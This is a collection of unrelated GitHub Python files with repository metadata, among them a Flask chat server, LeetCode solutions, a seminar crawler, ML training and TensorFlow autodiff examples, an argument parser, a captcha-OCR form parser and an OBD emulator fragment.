+ channelName + \"NOT IN CHANNEL LIST!\")\n return redirect(\"/home\")\n\n\n# This route returns the private messages page.\n@app.route(\"/privateMessages/\")\ndef privateMessages(username):\n # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n if session.get('username') != None:\n badgeInfo = badge(session.get('username'))\n else:\n badgeInfo = 0\n \n # Query for username private conversations\n targetNames = []\n for i in privateChannelList:\n if username in i[1]:\n targetNames.append(i[2])\n elif username in i[2]:\n targetNames.append(i[1])\n\n # Return private messages page\n return render_template(\"privMessages.html\", targetNames = targetNames, username = username, badge = badgeInfo)\n\n\n# This route returns the private message page.\n@app.route(\"/privateMessage//\")\ndef privateMessage(targetName, username):\n\n # Create compound names\n name1 = targetName + '&' + username\n name2 = username + '&' + targetName\n\n # Check if private channel exists and render channel template if it does.\n for i in privateChannelList:\n if name1 in i:\n messages = bufferDict[name1].get()\n i[4] = False\n return render_template(\"channel.html\", channelName = name1, messages = messages, username = username)\n elif name2 in i:\n messages = bufferDict[name2].get()\n i[3] = False\n return render_template(\"channel.html\", channelName = name2, messages = messages, username = username)\n\n # Create private channel otherwise.\n # Append private channel list ([channelName, user1, user2, user1unreadMessages, user2unreadMessages, user1_SID, user2_SID])\n privateChannelList.append([name1, targetName, username, False, False])\n\n # Create buffer dictionary with maximum storage of last 100 messages\n bufferDict[name1] = RingBuffer(100)\n\n print(\"private channel added:\", name1)\n \n return render_template(\"channel.html\", channelName = name1, messages = [], username = username)\n\n\n# This method determines if the user has private unread messages\ndef badge(username):\n unreadConvs = 0\n for i in privateChannelList:\n if username == i[1] and i[3] == True:\n unreadConvs += 1\n elif username == i[2] and i[4] == True:\n unreadConvs += 1\n return unreadConvs\n\n\n# When a join is submitted, this method joins the user to the channel\n@socketio.on('join')\ndef on_join(data):\n # Query username and channelName\n username = data['username']\n channelName = data['channelName']\n\n # Join that socket (SID) to the channel\n join_room(channelName)\n print(username + ' has joined ' + channelName)\n\n # # Check if it is a private channel and print joined SID if it is.\n # for i in privateChannelList:\n # if channelName in i and i[1] == username:\n # i[5] = request.sid\n # print(i[5] + ' joined ' + channelName)\n # elif channelName in i and i[2] == username:\n # i[6] = request.sid\n # print(i[6] + ' joined ' + channelName)\n\n\n# When a message is submitted, this method stores the message in server memory and broadcasts it to sockets.\n@socketio.on(\"submit message\")\ndef message(data):\n\n # Query for message, username and channel name\n content = data[\"content\"] # message\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Query for server time and edit it\n datetime_object = datetime.datetime.now()\n serverdatetime = datetime_object.strftime('%Y-%m-%d %H:%M:%S.%f')[:-10]\n\n # Store message in channel ring buffer\n bufferDict[channelName].append([username, serverdatetime, content, 'text'])\n\n # Notify unread messages if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[1] == username:\n i[4] = True\n elif i[2] == username:\n i[3] = True \n\n # Broadcast message to sockets.\n emit(\"announce message\", {\"username\": username, \"datetime\":serverdatetime, \"content\": content}, room=channelName)\n\n\n# When a file is submitted, this method stores the file in server memory and broadcasts it to sockets.\n@socketio.on(\"submit file\")\ndef fileUpload(data):\n\n # Query for file, username and channel name. File data is received, stored and broadcasted as DataURL.\n fileData = data[\"file\"]\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Query for server time and edit it\n datetime_object = datetime.datetime.now()\n serverdatetime = datetime_object.strftime('%Y-%m-%d %H:%M:%S.%f')[:-10]\n\n # Store message in channel ring buffer\n bufferDict[f'{channelName}'].append([username, serverdatetime, fileData, 'image'])\n\n # Notify unread messages if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[1] == username:\n i[4] = True\n elif i[2] == username:\n i[3] = True \n\n # Broadcast message to sockets\n emit(\"announce file\", {\"username\": username, \"datetime\":serverdatetime, \"file\": fileData}, room=channelName)\n\n\n# When a message is received by client, this method unchecks the unread values.\n@socketio.on(\"message received\")\ndef messageReceived(data):\n\n # Query for username and channel name\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Message is read if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[2] == username:\n i[4] = False\n # print(username + ' read the message')\n # print(i)\n elif i[1] == username:\n i[3] = False\n # print(username + ' read the message')\n # print(i)\n\n\n# When a file is received by client, this method unchecks the unread values.\n@socketio.on(\"file received\")\ndef fileReceived(data):\n\n # Query for username and channel name\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Message is read if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[2] == username:\n i[4] = False\n # print(username + ' read the message')\n # print(i)\n elif i[1] == username:\n i[3] = False\n # print(username + ' read the message')\n # print(i)\n\n\n# This implements a Ring Buffer of variable size.\nclass RingBuffer:\n \"\"\" class that implements a not-yet-full buffer \"\"\"\n def __init__(self,size_max):\n self.max = size_max\n self.data = []\n\n class __Full:\n \"\"\" class that implements a full buffer \"\"\"\n def append(self, x):\n \"\"\" Append an element overwriting the oldest one. \"\"\"\n self.data[self.cur] = x\n self.cur = (self.cur+1) % self.max\n def get(self):\n \"\"\" return list of elements in correct order \"\"\"\n return self.data[self.cur:]+self.data[:self.cur]\n\n def append(self,x):\n \"\"\"append an element at the end of the buffer\"\"\"\n self.data.append(x)\n if len(self.data) == self.max:\n self.cur = 0\n # Permanently change self's class from non-full to full\n self.__class__ = self.__Full\n\n def get(self):\n \"\"\" Return a list of elements from the oldest to the newest. \"\"\"\n return self.data\n\nif __name__ == \"__main__\":\n socketio.run(app)\n","repo_name":"Kokyuho/CS50-Web-flack","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33446482801","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def count_deep(self, root):\n if not root:\n return 0\n else:\n left_deep = self.count_deep(root.left)\n right_deep = self.count_deep(root.right)\n self.res = max(self.res, left_deep + right_deep + 1)\n return 1 + max(left_deep, right_deep)\n pass\n\n def diameterOfBinaryTree(self, root: TreeNode) -> int:\n\n self.res = 1\n\n if not root:\n return 0\n else:\n self.count_deep(root)\n\n return self.res - 1\n","repo_name":"lionheartStark/sword_towards_offer","sub_path":"leetcode/py36/二叉树的直径N543.py","file_name":"二叉树的直径N543.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43420935622","text":"#!/usr/bin/env python3\n# coding=utf-8\n# author=eltsai\n\nyears = [str(year) for year in range(2015, 2022)]\ndays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\nname='' # put your name here\n\nimport urllib.request\nfrom html_table_parser.parser import HTMLTableParser\nfrom bs4 import BeautifulSoup\n\n\ndef containsDay(string):\n if any([day in string for day in days]):\n return True\n return False\n\ndef containsName(string):\n return name in string\n\nstarter_week = \"https://secure.math.ucla.edu/seminars/weekly_list.php?t=1642287527\"\ncur = starter_week\ncount = 0\nwhile count <= 500:\n # print(count)\n count += 1\n # try:\n f = urllib.request.urlopen(cur)\n webpage = f.read().decode('utf-8')\n cur_year = 2022\n for year in years:\n if year in webpage:\n cur_year = year\n p = HTMLTableParser()\n p.feed(webpage)\n # print(year)\n date = None\n # print(p.tables[0][1:])\n for line_list in p.tables[0][1:]:\n for line in line_list:\n if containsDay(line):\n date = line\n if containsName(line):\n print(date, cur_year, line, line_list[line_list.index(line)+1])\n \n bsObj = BeautifulSoup(webpage, 'html.parser')\n\n links = bsObj.findAll('a')\n finalLinks = set()\n found = False\n link_list = []\n for link in links:\n #print(link.attrs)\n # if 'title' in link.attrs and link.attrs['title'] == 'Previous Week':\n # print(link.attrs['href'])\n if 'href' in link.attrs and '/seminars/weekly_list.php?t=' in link.attrs['href']:\n found =True\n link_list.append('https://secure.math.ucla.edu' + link.attrs['href'])\n # break\n # print(link.attrs)\n \n if len(link_list) <= 2:\n print(\"No previous week!\")\n break\n\n cur = link_list[1]\n\n# except:\n# print(f\"failed to open {starter_week}\")","repo_name":"eltsai/pythonGadgets","sub_path":"barcrawler/ucla_event_crawler.py","file_name":"ucla_event_crawler.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34772633976","text":"class Solution:\n\tdef lengthLongestPath(self, input):\n\t\t# 2 pointer approach\n\t\tdef advance(ptr, input):\n\t\t\tlevel = 0\n\t\t\twhile ptr < len(input) and input[ptr] != '\\n':\n\t\t\t\tif input[ptr] == '\\t':\n\t\t\t\t\tlevel += 1\n\t\t\t\tptr += 1\n\t\t\treturn level,ptr\n\t\tstack = []\n\t\tbegin = 0\n\t\tnum_tab = 0\n\t\tmax_length = 0\n\t\twhile begin < len(input):\n\t\t\t# advance till the next '\\n'\n\t\t\tnum_tab,end = advance(begin,input)\n\t\t\t# walk up the directory tree, if necessary\n\t\t\twhile len(stack) > num_tab:\n\t\t\t\tstack.pop()\n\t\t\t# dir/file string length\n\t\t\tlength = end-begin-num_tab\n\t\t\tif stack:\n\t\t\t\tlength += 1 # add 1 for delimiter '\\'\n\t\t\t# is this a file or dir?\n\t\t\tif '.' in input[begin:end]:\n\t\t\t\tmax_length = max(max_length, sum(stack) + length)\n\t\t\telse:\n\t\t\t\tstack.append(length)\n\t\t\t# advance pointer to start from position after '\\n'\n\t\t\tbegin = end + 1\n\t\treturn max_length\n","repo_name":"bhocoding/leetcode","sub_path":"leet388.py","file_name":"leet388.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11231747194","text":"import math\nimport os\nimport time\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom model import (\n TextLandmarkCollate,\n TextLandmarkLoader,\n TextLandmarkLoss,\n TextLandmarkModel,\n HParams,\n)\n\n\ndef load_checkpoint(checkpoint_path, model, optimizer, scaler, scheduler):\n assert os.path.isfile(checkpoint_path)\n print(f\"Loading checkpoint '{checkpoint_path}'\")\n checkpoint_dict = torch.load(checkpoint_path, map_location=\"cpu\")\n model.load_state_dict(checkpoint_dict[\"state_dict\"])\n optimizer.load_state_dict(checkpoint_dict[\"optimizer\"])\n scaler.load_state_dict(checkpoint_dict[\"scaler\"])\n scheduler.load_state_dict(checkpoint_dict[\"scheduler\"])\n iteration = checkpoint_dict[\"iteration\"]\n val_loss = checkpoint_dict[\"val_loss\"]\n print(f\"Loaded checkpoint '{checkpoint_path}' from iteration {iteration}\")\n return val_loss, iteration\n\n\ndef save_checkpoint(model, optimizer, scaler, scheduler, iteration, val_loss, filepath):\n print(f\"Saving model and optimizer state at iteration {iteration} to {filepath}\")\n torch.save(\n {\n \"val_loss\": val_loss,\n \"iteration\": iteration,\n \"scheduler\": scheduler.state_dict(),\n \"scaler\": scaler.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n \"state_dict\": model.state_dict(),\n },\n filepath,\n )\n\n\ndef validate(model, criterion, valset, batch_size, collate_fn):\n \"\"\"Handles all the validation scoring and printing\"\"\"\n model.eval()\n with torch.no_grad():\n val_loader = DataLoader(\n dataset=valset,\n sampler=None,\n num_workers=1,\n shuffle=False,\n batch_size=batch_size,\n pin_memory=False,\n collate_fn=collate_fn,\n )\n\n val_loss = 0.0\n steps = len(val_loader)\n for batch in val_loader:\n x, y = model.parse_batch(batch)\n y_pred = model(x)\n loss = criterion(y_pred, y)\n reduced_val_loss = loss.item()\n val_loss += reduced_val_loss\n val_loss /= steps\n\n model.train()\n return val_loss\n\n\ndef main(hparams, checkpoint_path=None):\n \"\"\"Training and validation logging results to tensorboard and stdout\n\n Params\n ------\n hparams (object): comma separated list of \"name=value\" pairs.\n checkpoint_path(string): checkpoint path\n \"\"\"\n torch.manual_seed(hparams.seed)\n torch.cuda.manual_seed(hparams.seed)\n\n # Initialise model with pretrained weights and freeze\n model = TextLandmarkModel(hparams)\n if torch.cuda.is_available():\n model = model.cuda()\n\n if hparams.fp16_run:\n model.decoder.xyz.attention_layer.score_mask_value = np.finfo(\"float16\").min\n model.decoder.mel.attention_layer.score_mask_value = np.finfo(\"float16\").min\n\n # Setup data loaders\n trainset = TextLandmarkLoader()\n valset = TextLandmarkLoader(train=False)\n collate_fn = TextLandmarkCollate()\n train_loader = DataLoader(\n dataset=trainset,\n num_workers=1,\n shuffle=True,\n sampler=None,\n batch_size=hparams.batch_size,\n pin_memory=False,\n drop_last=True,\n collate_fn=collate_fn,\n )\n\n # Load checkpoint if one exists\n best = 100\n iteration = 0\n epoch_offset = 0\n optimizer = torch.optim.Adam(\n params=model.parameters(),\n lr=hparams.learning_rate,\n weight_decay=hparams.weight_decay,\n )\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=hparams.learning_rate,\n steps_per_epoch=len(train_loader),\n epochs=hparams.epochs,\n )\n scaler = torch.cuda.amp.GradScaler(enabled=hparams.fp16_run)\n criterion = TextLandmarkLoss()\n\n if checkpoint_path is not None:\n best, iteration = load_checkpoint(\n checkpoint_path, model, optimizer, scaler, scheduler\n )\n epoch_offset = max(0, int(iteration / len(train_loader)))\n\n model.train()\n # ================ MAIN TRAINNIG LOOP! ===================\n for epoch in range(epoch_offset, hparams.epochs):\n print(f\"Epoch: {epoch}\")\n for batch in train_loader:\n start = time.perf_counter()\n model.zero_grad()\n with torch.cuda.amp.autocast():\n x, y = model.parse_batch(batch)\n y_pred = model(x)\n loss = criterion(y_pred, y)\n\n reduced_loss = loss.item()\n scaler.scale(loss).backward()\n\n scaler.unscale_(optimizer)\n grad_norm = torch.nn.utils.clip_grad_norm_(\n parameters=model.parameters(),\n max_norm=hparams.grad_clip_thresh,\n )\n\n scaler.step(optimizer)\n scaler.update()\n optimizer.zero_grad()\n scheduler.step()\n\n iteration += 1\n duration = time.perf_counter() - start\n print(\n f\"Train loss {iteration} {reduced_loss:.6f} \"\n f\"Grad Norm {grad_norm:.6f} {duration:.2f}s/it\"\n )\n\n if iteration % hparams.iters_per_checkpoint == 0:\n val_loss = validate(\n model, criterion, valset, hparams.batch_size, collate_fn\n )\n print(f\"Validation loss {iteration}: {val_loss:9f}\")\n if val_loss < best and not math.isnan(grad_norm):\n save_checkpoint(\n model,\n optimizer,\n scaler,\n scheduler,\n iteration,\n val_loss,\n \"best.pt\",\n )\n best = val_loss\n\n\nif __name__ == \"__main__\":\n hparams = HParams(\n n_landmark_xyz=60,\n # max_decoder_steps=240,\n # epochs=50,\n iters_per_checkpoint=50,\n learning_rate=2e-3,\n batch_size=8,\n fp16_run=True,\n )\n\n torch.backends.cudnn.enabled = hparams.cudnn_enabled\n torch.backends.cudnn.benchmark = hparams.cudnn_benchmark\n\n print(\"FP16 Run:\", hparams.fp16_run)\n print(\"cuDNN Enabled:\", hparams.cudnn_enabled)\n print(\"cuDNN Benchmark:\", hparams.cudnn_benchmark)\n\n main(hparams)\n","repo_name":"sweatybridge/text-to-anime","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6308,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"23414811126","text":"from django.conf.urls import patterns, url\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('arbor.views',\n url(r'^$', 'arbor_index', name='arbor_index'),\n url(r'api/geocode/$', 'arbor_api_geocode', name='arbor_api_geocode'),\n url(r'api/image/$', 'arbor_api_botanical_image', name='arbor_api_botanical_image'),\n url(r'comments/list/$', 'arbor_comments_list', name='arbor_comments_list'),\n url(r'comments/add/$', 'arbor_comments_add', name='arbor_comments_add'),\n)\n\n","repo_name":"hohenstaufen/ustmat","sub_path":"ustmat/arbor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"39471353808","text":"import numpy as np\n\nclass Perturb:\n \"\"\"\n A simple perturb mechanism as specified in (Jaderberg et al., 2017).\n \"\"\"\n def __init__(self, cs_space=None, boundaries={}):\n self.boundaries = boundaries\n self.cs_space = cs_space\n \n def __call__(self, hyperparameters: dict) -> dict:\n \"\"\"\n Perturb the nodes in the input.\n :param hyperparameters: A dict with nodes.\n :return: The perturbed nodes.\n \"\"\" \n result = hyperparameters.copy()\n\n for key in hyperparameters:\n temp_value = self.cs_space[key]._inverse_transform(result[key])\n temp_value += np.random.choice([-1, 1]) * 0.2 * temp_value\n result[key] = self.cs_space[key]._transform(temp_value)\n self.ensure_boundaries(result)\n return result\n\n def ensure_boundaries(self, result):\n for key in result:\n if key not in self.boundaries:\n continue\n if result[key] < self.boundaries[key][0]:\n result[key] = self.boundaries[key][0]\n elif result[key] > self.boundaries[key][1]:\n result[key] = self.boundaries[key][1]\n","repo_name":"automl/HPO_for_RL","sub_path":"pbt/exploration/perturb.py","file_name":"perturb.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"21726370759","text":"import os\nimport sys\nimport time\n#^^^^^^^^^^^^^^^^^^^^^^^^^\n#these are required libraries, used for different things such as clearing console, making the program sleep/pause for a period of time, etc.\n\n#basic code to assist you in learning the basics of python.\n#i included notes to tell you what everything does.\n\n#basic terms are below:\n#if (if a condition is met)\n#elif (else if, if the 'if' condition is not met, it will look for another condition)\n#else (else, essentially if all other if/elif statements are not met, it will continue with the code under this)\n\n#important knowledge below:\n#indentations are super important, you need to learn them very quickly, tabs make a huge difference in python.\n\ndef main():\n\tos.system('cls') \n\tprint(\"\"\"\n\t\tepic math python script\n\n\t\t1 / add / + | addition\n\n\t\tgithub.com/joshuadupont\n\n\t\"\"\") #outputs the base message to console, what you see when you run the script.\n\n\tmathC = input(\"What operation would you like to use? \") #asks the user for an input, which is used below this\n\n\tif mathC == \"1\" or mathC == \"add\" or mathC == \"+\": #filters out the users input, if the users input is what is in the quotes, it will then proceed to go on to other code.\n\t\taInput1 = int(input(\"Number 1: \")) #user input code, asks the user for input (its also a integer input, so the input will be used as integers, for this script it is required, unless you want to convert them afterwards, which i do not recommend for something so small.)\n\t\taInput2 = int(input(\"Number 2: \")) #user input code, asks the user for input (its also a integer input, so the input will be used as integers, for this script it is required, unless you want to convert them afterwards, which i do not recommend for something so small.)\n\t\tadditionResults = aInput1 + aInput2 #the sum of both numbers, \n\t\tprint(f'The sum of {aInput1} + {aInput2} is:\\n{additionResults}')\n\t\ttime.sleep(5) #puts the program to sleep for 5 seconds, aka pauses the program. \n\t\tmain() #calls back to the main definition, pretty much resets the whole thing.\n\t\n\telse: #if the input does not match one of the conditions/choices in quotes in the if statement, it will go to this chunk of code. \n\t\tprint(\"Please input a valid operation.\") #outputs to console that the choice is invalid.\n\t\ttime.sleep(5) #puts the program to sleep for 5 seconds, aka pauses the program. \n\t\tmain() #calls back to the main definition, pretty much resets the whole thing.\n\nmain() #starts the program, if i were to not include a def() main:, then we would not need to do this.","repo_name":"joshuadupont/py-calculator","sub_path":"p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"115572358","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport subprocess\n\ndef main(argv=sys.argv[1:]):\n working_dir = argv[0]\n tests = argv[1:]\n print(\"Working directory: {}\".format(working_dir))\n print(\"Running tests: \", tests)\n\n test_dir = working_dir + \"/test_results\"\n if not os.path.exists(test_dir):\n os.makedirs(test_dir)\n\n for the_file in os.listdir(test_dir):\n file_path = os.path.join(test_dir, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n commands = []\n\n for cmd in tests:\n test_cmd = \"./\" + cmd + \" --gtest_output=xml:\" + working_dir + \"/test_results/\"\n print(\"Running: \", test_cmd)\n rc = subprocess.call(test_cmd, cwd=working_dir, shell=True)\n if rc == True : #in case of test failure\n sys.exit(1)\n\n commands.insert(0, test_cmd)\n\n print(\"Ran the following commands: \")\n for cmd in commands:\n print(\"-- \", cmd)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ethz-adrl/control-toolbox","sub_path":"ct/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1242,"dataset":"github-code","pt":"76"} +{"seq_id":"23040231182","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.eager.backprop import GradientTape\n\n# ex 1\n\nx = tf.Variable(3.0)\n\nwith tf.GradientTape() as tape:\n y = x**2\n\ndy_dx = tape.gradient(y, x)\ndy_dx.numpy()\n\n\n# ex 2\n\nw = tf.Variable(tf.random.normal((3, 2)), name=\"w\")\nb = tf.Variable(tf.zeros(2, dtype=tf.float32), name=\"b\")\nx = [[1., 2., 3.]]\n\nwith tf.GradientTape() as tape:\n y = x @ w + b\n loss = tf.reduce_mean(y**2)\n \n[dl_w, dl_b] = tape.gradient(loss, [w, b])\n\n# ex 3\n\nlayer = tf.keras.layers.Dense(2, activation=\"relu\")\nx = tf.constant([[1., 2., 3.]])\n\nwith tf.GradientTape() as tape:\n y = layer(x)\n loss = tf.reduce_mean(y**2)\n\ngrad = tape.gradient(loss, layer.trainable_variables)\n\n# ex 4\n\nx = tf.constant(3.0)\nwith tf.GradientTape() as tape:\n tape.watch(x)\n y = x**2\n\ndx = tape.gradient(y, x)","repo_name":"aqqosh/ml_algorithms","sub_path":"basics/autodiff.py","file_name":"autodiff.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16959462042","text":"## -------\n## Imports\n\nimport re\n\n\n## -----\n## Class\n\nclass Arguments:\n \"\"\"\n Class that contains command-line arguments in a neat format.\n @author Carlos L. Cuenca\n \"\"\"\n\n ## -------------\n ## Static Fields\n\n Log = None\n\n ## --------------\n ## Static Methods\n\n @staticmethod\n def parse_from(arguments: list) -> dict:\n \"\"\"\n Reads in the arguments from the list and groups the contents into key-value pairs\n :param arguments: The string arguments to parse\n :return: dictionary containing the arguments\n \"\"\"\n\n # Initialize the result\n result = {}\n index = 0\n\n # Iterate through the range of arguments\n while index < len(arguments):\n\n # If we have an argument\n if arguments[index] is not None and arguments[index].startswith('-'):\n\n # Initialize the key, argument & increment the index\n key = re.sub(r'-+', '', arguments[index])\n index += 1\n\n # Check if the key is in the collection\n if key not in result:\n # Initialize the argument to None\n result[key] = None\n\n # Sub-iterate\n while index < len(arguments) and not arguments[index].startswith('-'):\n\n # Check if we have a key\n if result[key] is None:\n\n # Initialize the argument\n result[key] = arguments[index]\n\n # Otherwise\n else:\n\n # If the value is not already a list\n if not isinstance(result[key], list):\n # Reset the value\n result[key] = [result[key]]\n\n # Append the current argument\n result[key].append(arguments[index])\n\n # Increment the index\n index += 1\n\n # Otherwise\n else:\n\n # Increment the index\n index += 1\n\n # Finally, return the result\n return result\n\n ## ---------\n ## Overloads\n\n def __init__(self, arguments, required):\n \"\"\"\n Initializes the Arguments instance to its' default state.\n :param arguments: The arguments list to parse\n \"\"\"\n\n # Initialize the collection\n self.dictionary = Arguments.parse_from(arguments)\n self.count = len(self.dictionary)\n\n # If we have required arguments\n if required is not None:\n\n # Check the required arguments\n for argument in required:\n\n # Check\n if argument not in self.dictionary:\n\n # Log the error and exit\n if Arguments.Log is not None: Arguments.Log.Error(f'Error: Required argument \\'{argument}\\' not specified.')\n\n def __dict__(self):\n \"\"\"\n Returns the dict representation of the Arguments instance\n :return: dict containing the arguments as key-value pairs\n \"\"\"\n\n return self.dictionary\n\n def __getitem__(self, item):\n \"\"\"\n Returns the value corresponding with the specified item\n :param item: The key corresponding to the value to retrieve\n :return: The value corresponding with the key\n \"\"\"\n\n return self.dictionary[item]\n","repo_name":"clcuenca/graph-service","sub_path":"lib/mlscripts/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"554475525","text":"from collections import defaultdict\n\nclass Solution:\n def doDFS(self,graph,visited,root,target,prod):\n print(\"STEP:\",root,target)\n ret = -1\n if target in graph[root]:\n return prod*graph[root][target]\n \n neighbours = graph[root]\n visited.add(root)\n \n for n,v in neighbours.items():\n if n not in visited:\n print(\"Multi\",n,graph[root][n] )\n ret = self.doDFS(graph,visited,n,target,prod*graph[root][n])\n if ret!=-1:\n break\n \n return ret\n \n \n \n def calcEquation(self, eq: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n \n \n graph = defaultdict(dict)\n \n for i in range(len(eq)):\n graph[eq[i][0]][eq[i][1]] = values[i]\n \n graph[eq[i][1]][eq[i][0]]=1/values[i]\n \n print(graph)\n \n results = []\n for q in queries:\n print(q)\n if q[0] not in graph or q[1] not in graph:\n results.append(-1)\n \n elif q[0] == q[1]:\n # print('ye:',q)\n results.append(1) \n \n else:\n visited = set()\n print(\"FOR\",q)\n results.append(self.doDFS(graph,visited,q[0],q[1],1))\n \n return(results)\n \n \n \n ","repo_name":"DhruvSrivastava-16/LEETCODE-PRACTISE-","sub_path":"evaluate-division/evaluate-division.py","file_name":"evaluate-division.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34065309157","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/15 16:43\n# @Author : Philly\n# @Site : \n# @File : parse_captcha.py\n# @Software : PyCharm Community Edition\nfrom lxml.html import fromstring\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nimport base64\nimport pytesseract\n\ndef parse_form(html):\n tree = fromstring(html)\n data = {}\n for e in tree.cssselect('form input'): # pip install cssselect\n if e.get('name'):\n data[e.get('name')] = e.get('value')\n return data\n\ndef get_captcha_img(html):\n tree = fromstring(html)\n img_data = tree.cssselect('div img#verifyCode').get('src')\n # img_data = img_data.partition(',')[-1]\n binary_img_data = base64.b64decode(img_data)\n img = Image.open(BytesIO(binary_img_data))\n return img\n\nif __name__ == '__main__':\n html = requests.get('http://192.168.14.38:88/User/Login')\n form = parse_form(html.content)\n print(form)\n\n img = get_captcha_img(html.content)\n tessdata_dir_config = '--tessdata-dir \"D:\\\\testsoft\\\\Tesseract-OCR\\\\tessdata\"'\n pytesseract.image_to_string(img, tessdata_dir_config)","repo_name":"qi7q/NIPauto","sub_path":"captcha/parse_captcha.py","file_name":"parse_captcha.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45314144033","text":"\"\"\"\n\"\"\"\n\nimport bpy\n\nactiveOb = bpy.context.view_layer.objects.active\ngrpExists = False\n\nif bpy.context.active_object is not None:\n grpName = bpy.context.active_object.name + \"_grp\"\n\n for grp in bpy.data.groups:\n if grp.name == grpName:\n grpExists = True\n\n if grpExists == False:\n bpy.ops.group.create(name=grpName)\n\n for ob in bpy.context.selected_objects:\n bpy.context.view_layer.objects.active = ob\n bpy.ops.object.group_link(group=grpName)\n\nbpy.context.view_layer.objects.active = activeOb\n","repo_name":"WeisongZhao/MyWeb2","sub_path":"collections/groups_deprecated_2.7/group_Name_Active.py","file_name":"group_Name_Active.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"4613238978","text":"\nimport time\nimport threading\nimport sys\nfrom .obd import OBDEmulator\nfrom .OBDResponse import OBDResponse\n\n\"\"\" class to make asynchronous querys \"\"\"\nclass Async(OBDEmulator):\n\n def __init__(self, delay_cmds=0.25):\n super.__init__()\n self.__thread = None\n self.__commands = {} # key = OBDCommand, value = Response\n self.__callbacks = {} # key = OBDCommand, value = list of Functions\n self.__running = False\n self.__was_running = False\n self.__delay_cmds = delay_cmds\n\n @property\n def running(self):\n return self.__running\n\n def start(self):\n \"\"\" Starts the async update loop \"\"\"\n\n if len(self.__commands) == 0:\n sys.exit('Async thread not started because no commands were registered')\n\n if self.__thread is None:\n print(\"Starting async thread\")\n self.__running = True\n self.__thread = threading.Thread(target=self.run)\n self.__thread.daemon = True\n self.__thread.start()\n\n def stop(self):\n \"\"\" Stops the async update loop \"\"\"\n if self.__thread is not None:\n print(\"Stopping async thread...\")\n self.__running = False\n self.__thread.join()\n self.__thread = None\n print(\"Async thread stopped\")\n\n def paused(self):\n \"\"\"\n A stub function for semantic purposes only\n enables code such as:\n\n with connection.paused() as was_running\n ...\n \"\"\"\n return self\n\n def __enter__(self):\n \"\"\"\n pauses the async loop,\n while recording the old state\n \"\"\"\n self.__was_running = self.__running\n self.stop()\n return self.__was_running\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"\n resumes the update loop if it was running\n when __enter__ was called\n \"\"\"\n if not self.__running and self.__was_running:\n self.start()\n\n return False # don't suppress any exceptions\n\n def close(self):\n \"\"\" Closes the connection \"\"\"\n self.stop()\n super(Async, self).close()\n\n def watch(self, c, callback=None):\n \"\"\"\n Subscribes the given command for continuous updating. Once subscribed,\n query() will return that command's latest value. Optional callbacks can\n be given, which will be fired upon every new value.\n \"\"\"\n\n # the dict shouldn't be changed while the daemon thread is iterating\n if self.__running:\n print(\"Can't watch() while running, please use stop()\")\n else:\n\n # new command being watched, store the command\n if c not in self.__commands:\n print(f\"Watching command: {str(c)}\")\n\n # TODO falta implementar OBDResponse()\n self.__commands[c] = 